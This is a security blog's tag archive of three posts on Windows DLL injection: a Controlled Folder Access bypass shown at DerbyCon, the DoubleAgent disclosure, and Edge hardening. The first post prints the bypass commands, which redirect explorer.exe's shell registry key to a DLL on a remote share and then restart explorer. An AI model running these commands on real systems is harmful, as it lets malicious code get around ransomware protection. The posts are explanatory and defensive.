Tag Archives: DLL Injection

Security Researcher Demonstrates Bypass for Controlled Folder Access

In Windows 10 version 1709 (also known as the Fall Creator’s Update or Redstone 3) and later versions Microsoft introduced a feature known as Controlled Folder Access which aims to prevent ransomware (or unknown applications) from encrypting files within folders that you specify. Further details are provided here.

Last week at the DerbyCon security conference a security researcher, Soya Aoyama from Fujitsu System Integration Laboratories demonstrated how DLL injection (The technique of DLL injection is explained in more detail here and here.) could be used to add a DLL (defined) to the user interface (UI) of Windows 10 (in the form of the shell process, explorer.exe).

The Controlled Folder Access works by preventing any applications not present on a whitelist (a list of allowed applications) from modifying the files in the folders listed as requiring protected. Using the fact that explorer.exe is present on that allowed list; enabled the researcher to bypass this ransomware protection by adding the DLL as a context menu handler. This list of context handlers would usually allow you to for example; perform an anti-malware scan on a file by right clicking or to compress a file using 7-Zip. This list is stored in the Windows Registry at the following location:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

In order to interact with a user explorer.exe by default it loads the shell.dll from the following location:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InProcServer32

Aoyama changed the DLL value from shell.dll to his DLL in order that explorer.exe would load it when it started. He then terminated and restarted explorer.exe to successfully load his DLL.

Microsoft currently not in favour of patching this vulnerability
As per Microsoft’s 10 immutable laws of security; at this time they don’t intend to patch this vulnerability since it relies on an attacker having already compromising your system and using it to run a legitimate command to load a malicious DLL into explorer.exe:

reg add HKCU\Software\Classes\CLSlD\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\lnprocServer32 /f /ve /t REG SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll

taskkill /1M explorer.exe /F

start explorer.exe

Due to this pre-requisite of compromising the system first; this issue won’t be patched. This bypass however does not require administrative (defined) access. Aoyama also demonstrated that Windows Defender did not detect this bypass; neither did other anti-malware solutions such as: Avast, ESET, Malwarebytes Premium or McAfee.

How can I protect myself from this bypass?
There are limited options available at this time to prevent this bypass from occurring. If an attacker can download the necessary DLL to your systems and load it; there is a possibility that your anti-malware solution may detect it since the DLL will likely have a low reputation (it would not be a commonly used file); but this is not guaranteed. This especially true since other anti-malware vendors did not detect it.

HitmanPro.Alert may detect this DLL on your system before it has been added to explorer.exe but would require you to have the premium version installed and monitoring your systems to do so.

The key to prevent the above from occurring would be to follow standard email and instant messaging best practices and lock your system (requiring a password or other form of authentication when you return to the system) when you are away from it to prevent someone entering commands. Keeping your system up to date will also reduce the risk of such a DLL from being downloaded if you were to click on a link in an email or instant message or via a drive by download.

If an attacker can physically access and type commands on your system; application white listing in the form of Windows AppLocker would not by default prevent (but even that feature can be bypassed) this attack since the command run by Aoyama makes use of legitimate Windows tools. If an attacker was to try to execute a script for the command (which is far more likely); AppLocker would block it if it is configured to block unknown scripts.

The DLL blocking feature of Windows AppLocker would also assist in this context but may introduce a performance penalty due to the level of effort it needs to undertake to carry out these checks.

Monitoring the location within the Window registry for changes using a tool such Autoruns is also a possibility but you would need to do this manually and given that ransomware doesn’t usually wait to encrypt your files is likely to be ineffective/too slow to detect this bypass.

Given the attention this bypass has received; anti-malware software may detect changes to the explorer.exe context handlers or the shell location going forward but again this is not guaranteed.

I am investigating another option and will update this post when I have more information available.

Thank you.

 

 

“DoubleAgent” Vulnerability Disclosure: What you need to know

In late March a security vulnerability was disclosed by the Israeli security firm Cybellum. However this was no ordinary public disclosure as I will explain below. Apologies for the untimely nature of this blog post due to other commitments:

What made this disclosure different?
At first glance this disclosure appeared very serious. It discussed the use of the Microsoft Application Verifier present within Windows XP up to and including Windows 10. They detail the leveraging of this tool to add a customised verifier DLL (defined) to hijack any legitimate process (defined) within Windows.

They demonstrated this attack against anti-malware software specifically Norton Security (by Symantec) resulting in a rogue DLL being injected (defined here and here) into the Norton process (ns.exe as demonstrated within their YouTube video). Despite claims by Cybellum security firms such as Avira and Comodo have reported this attack cannot bypass the self-protection features within their products. The full list of capabilities this attack provides is within this news article.

Windows Internals expert; Alex Ionescu later revealed the researchers from Cybellum used his work concerning protected processes to create this exploit and this was already a known issue. As was pointed out in the Twitter timelines linked to below once an attacker has administrative control over your system they could simply uninstall your security software rather than trying to bypass rendering the threat of this exploit far less important/relevant.

Twitter Timeline 1
Twitter Timeline 2
Twitter Timeline 3
Twitter Timeline 4
Twitter Timeline 5

Does this disclosure only affect security software?
It’s important to note this attack potential affects all software on Windows rather than just security software. In addition the proof of concept (PoC) exploit requires no changes for any application you choose to attack. Security software was chosen since almost all systems have anti-malware software installed and their process names are trusted (and allowed within application white listed (defined) environments).

How can I protect myself from this exploit?
Since this attack requires administrative privileges (defined) on Windows to have the intended effect, using a standard user account for everyday use will mitigate this attack.

From the various statements issued by the affected anti-malware vendors (listed below) please ensure your anti-malware software is the latest version available to ensure this attack is ineffective.

Traditional defences such patching your operating system, your web browser and being cautious of the attachments you open will also reduce the risk posed by this attack.

NetworkWorld Anti-Malware Vendor Responses

Malwarebytes Anti-malware

Symantec Endpoint Protection

Symantec Endpoint Protection Affected Versions

Thank you.

Microsoft Updates Edge Browser To Harden Against DLL Injection

On the 12th of November Microsoft began rolling out Windows 10 Build 10586 (also known as Version 1511). This was the first major update made available for Windows 10. Included in this update was an improved version of Microsoft Edge, the default browser of Windows 10.

For most consumers, this update will be delivered automatically to their PCs. For businesses and large organizations using the new Windows Update for Business they should be able to choose a time when they wish to deploy this update more widely to the company’s employees.

What’s The Main Security Improvement in This Update?
In the updated version of Microsoft Edge, known as EdgeHTML 13, DLLs (Dynamic Link Libraries, defined) are no longer permitted to load within Edge. DLLs are loaded into a Windows application using a technique known as DLL injection. The technique of DLL injection is explained in more detail here and here. It is this technique that Edge has been hardened against to prevent it succeeding.

Why Was This Change Made?
If an unauthorized DLL is loaded into a web browser, it can do such things as displaying un-wanted adverts (such as the type previously discussed by Google) or installing unnecessary toolbars that may attempt to re-direct your web searches from your preferred search engine to another search engine in order to benefit from increased usage (and possibly increased revenue when adverts are displayed among those search results). Such unwanted adverts and/or toolbars annoy and distract users and make their web browser less user friendly.

If I’m a Microsoft Edge user, how will this benefit me?
If you like using Microsoft Edge on Windows 10, this change will mean that it will be harder for adware and malware to be loaded into your browser either for malicious purposes or to simply display adverts. This means that your web browser is more likely to work the way you prefer and you can simply concentrate on achieving what you would like to do.

I welcome this change which makes every day browsing for Microsoft Edge users safer. Thank you.